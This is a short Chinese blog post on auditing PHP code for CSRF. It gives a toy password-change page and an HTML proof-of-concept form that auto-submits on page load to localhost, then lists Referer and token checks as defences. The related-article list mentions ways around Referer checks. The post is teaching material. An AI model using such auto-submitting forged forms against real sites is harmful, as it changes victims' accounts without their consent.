【php代码审计】csrf

最新推荐文章于 2022-11-24 10:41:01 发布
最新推荐文章于 2022-11-24 10:41:01 发布
阅读量161 收藏
点赞数
分类专栏: PHP代码审计 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chualam/article/details/120181559
版权

php环境

<?
$pass = $_POST['pass'];
echo $pass;
?>
<form action="" method="post">
<p>修改密码<input name="pass" type="text"></p>
<input name="sub" type="submit">
</form>

html payload代码

<script>
function post() {
document.getElementById('post').submit();
}
</script>
<body οnlοad="post();">
<form id="post" method="post" action="http://localhost/index.php">
<input name="pass" value="sb">
</form>

防御方法:

验证http_referer字段

验证token

снυαιαм ιее
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
代码审计csrf,ssrf
willow_liang的博客
11-12 369
CSRF (Cross -site request forgery)跨站请求伪造 csrf原理: 攻击者盗用了你的身份,以你的名义向第三方网站发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作,比如以你的名义发送邮件,发私信,添加管理用户,甚 至于交易转账等。 攻击者在用户浏览网页时,利用页面元素(例如img的src),强迫受害者的浏览器向Web应用程序发送一个改变用户信息的请求。由于发生CSRF攻击后,攻击者是强迫用户向服务器发送请求,所以会造成用户信 息被...
DVWA之CSRF代码审计
good good study
09-01 3415
目录 Low Medium High Impossible Low 如下,我们知道页面的功能一个有两个。一个是修改当前dvwa登录密码,一个是测试密码是否修改成功 我们可以看到low难度的源代码,并没有添加token 且修改密码是通过get请求发送,该修改请求可以构造 即,存此存在csrf的原因为 发送修改密码的请求没有加token 后台无token验证,不能证明请求的唯一性与真实性 修改密码无旧密码验证 发送修改密码的请求数据容易被伪造 所以只要诱骗当前账户(...
java代码审计CSRF
糖小喵
05-06 625
介绍 这种漏洞一般不需要通过代码审计来发掘直接黑盒最方便 CSRF原理 审计策略 此类漏洞一般都会在框架解决修复,所以在审计 csrf 漏洞时。首先要熟悉框架对 CSRF 的防护方案, 一般审计时可查看增删改请求重是否有 token、 formtoken 等关键字以及是否有对请求的 Referer 有进 行校验。手动测试时,如果有 token 等关键则替换 token 值为自定义值并重...
PHP代码审计CSRF 跨站请求伪造
一生无悔惜缘的博客
07-25 626
一.CSRF  是什么? CSRF(Cross-site request forgery),文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF。 二.CSRF  可以做什么? 你这可以这么理解 CSRF 攻击: 攻击者盗用了你的身份,以你的名义发送恶意请求 。 CSRF 能够做的事情包括:以你名义发送邮件,发消息,
php代码审计【10】CSRF代码审计
司徒荆的博客
06-27 344
CSRF代码审计
PHP代码审计文档.zip
11-02
第19课:PHP代码审计之会话认证漏洞mp4 第18课:PHP伪协议mp4 第17课:PHP弱类型mp4 第16课:PHP代码审计之反序列化漏润mp4 第15课:PHP代码审计之变量盖漏洞mp4 第14课PHP代码审计之任意文件读取及删除漏洞mp4 第13课...
PHP代码审计音频文件.zip
11-02
任务19:PHP代码审计之会话认证漏洞mp4 任努18:PHP伪协议mp4 任务17:PHP弱类型mp4 任务16:PHP代码审计之反序列化漏润mp4 任务15:PHP代码审计之变量盖漏洞mp4 任务14PHP代码审计之任意文件读取及删除漏洞mp4 任务13...
PHP代码审计CSRF-CSRF漏洞源码审计总结
最新发布
04-09
PHP代码审计CSRF/CSRF漏洞源码审计总结 DedeCMS-V5.7-U TF8-SP2.tar.gz DedeCMS-V5.7-UTF8-SP2.tar .gz DedeCMS-V5.7-UTF8-SP2.tar.gz PHP代码审 计之CSRF.part2.rar (15.67 MB)
PHP代码审计资料整理
03-04
PHP代码审计是软件开发过程的一个重要环节,尤其是在后端开发领域。它涉及到对PHP源代码进行深入检查,以发现潜在的安全漏洞、性能瓶颈和其他质量问题。本资料整理将围绕PHP代码审计这一主题,涵盖PHP开发语言的...
代码审计资料整理——新手学习
10-13
"LAMP安全审计之PHP代码审计_paper.pdf",LAMP(Linux, Apache, MySQL, PHP)是常见的Web开发环境,这份论文可能详细介绍了PHP代码审计的流程和技术,对于PHP初学者而言,这是深入理解PHP安全的关键。 "小脚本,大...
PHP代码审计———11、PHP代码审计CSRF
Fly_鹏程万里
05-16 637
CSRF是什么CSRF(Cross-Site-request-forgery),文名:跨站请求伪造,也被称为:one click attack/session riding,缩写为CSRF、XSRFCSRF可以做什么你可以这样理解CSRF攻击:攻击者盗用了你的身份,以你的名义发出恶意请求。CSRF能够做的事情包括:以你的名义发送邮件、发消息、盗取你的账号、甚至购买商品等等。造成的问题主要是:个人...
第二阶段 PHP代码审计CSRF(客户端请求伪造)
qq_22132931的博客
11-24 614
PHP代码审计CSRF(客户端请求伪造)
代码审计—DVWA—CSRF— Low
王嘟嘟的博客
10-30 410
0x00 前言 如饥似渴的学习ing。 你可能需要看看: https://blog.csdn.net/qq_36869808/article/details/83029980 说明 其实之前对CSRF都不是很了解。但是现在正好在做代码审计,所以还是要进行一个深入了解,希望自己可以很快的进步。 0x01 start 1.黑盒 也就是只要有Cookie,就可以执行任何操作。如果没有其他限制的话,就可以...
代码审计CSRF原理及修复
无心的博客
09-28 551
在平时的测试csrf也是比较容易发现的,主要就是看它对一个操作,有没有检测其时效性(这样表述可能不太准确),一般的防护方法就是添加token来进行校验,并及时对其进行失效处理。 以下所有代码都是我自己写的,可能有不美观,代码错误等等问题,希望大家可以指正。 在进行添加的时候进行抓包 利用burp自带的工具转成CSRF利用代码 此时,我们先看一下当前的内容 然后,就需要构造一个链接,然后...
PHP代码审计——CSRF漏洞(Hucart)
W小哥
11-19 360
漏洞位置1: 在用户修改基本信息的位置,只验证了useridval,只要有用户的session信息,就更新传输过来的数据,执行if语句里面的更新数据的代码:user_idval,只要有用户的session信息,就更新传输过来的数据,执行if语句里面的更新数据的代码:useri​dval,只要有用户的session信息,就更新传输过来的数据,执行if语句里面的更新数据的代码:this -> db -> query_sql( $update_sql ); 漏洞:没有进行token的验证,可以产生CS
CSRF漏洞
武天旭的博客
10-05 1646
一、漏洞描述 跨站请求伪造攻击。 攻击者在用户浏览网页时,利用页面元素(例如img的src),强迫受害者的浏览器向Web应用程序发送一个改变用户信息的请求。 由于发生CSRF攻击后,攻击者是强迫用户向服务器发送请求,所以会造成用户信息被迫修改,更严重者引发蠕虫攻击。
PHP-代码审计-CSRF
weixin_44110913的博客
08-27 157
挖掘经验 黑盒挖掘 抓包看看有没有token,如果没有token的话,再请求该页面,不带referer,如果返回数据还是一样很可能就存在csrf漏洞 白盒挖掘 读代码的时候,看看几个核心文件有没有验证token和referer相关的代码,这里的核心文件指的是被大量文件引用的基础文件,或者直接搜token这个关键字找,如果核心文件没有,再去看看你关心的功能点的代码有没有验证 漏洞防范 添加token验证 ...
php模拟referer,php HTTP_REFERER模仿代码
weixin_29185167的博客
03-28 259
如果直接点击上面的链接,那么页面会显示referer页面的链接.代码如下:set http = createobject("msxml2.xmlhttp")http.open "get","http://www.phprm.com/test/referer.php",falsehttp.setrequestheader "referer","http://www.phprm.com"http.se...
php获取refer防止csrf,CSRF   花式绕过Referer技巧
weixin_39856630的博客
03-27 279
做项目遇到Referer绕过的情况 有同事问起 这几天不是很忙 就把自己知道的方法记录下。有条件限制 不一定所有的Refere验证就可以绕过1.Refere为空条件下解决方案:利用ftp://,http://,https://,file://,javascript:,data:这个时候浏览器地址栏是file://开头的,如果这个HTML页面向任何http站点提交请求的话,这些请求的Referer都...
PHP代码审计入门指南1
08-04
这本《PHP代码审计入门指南》是一本涵盖了学习PHP代码审计过程整理出的一些技巧和对漏洞的一些理解的指南。在本指南,将介绍PHP审计的基础知识、工具准备、常用快捷键、审计思路、用户可控输入速查表、敏感函数...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值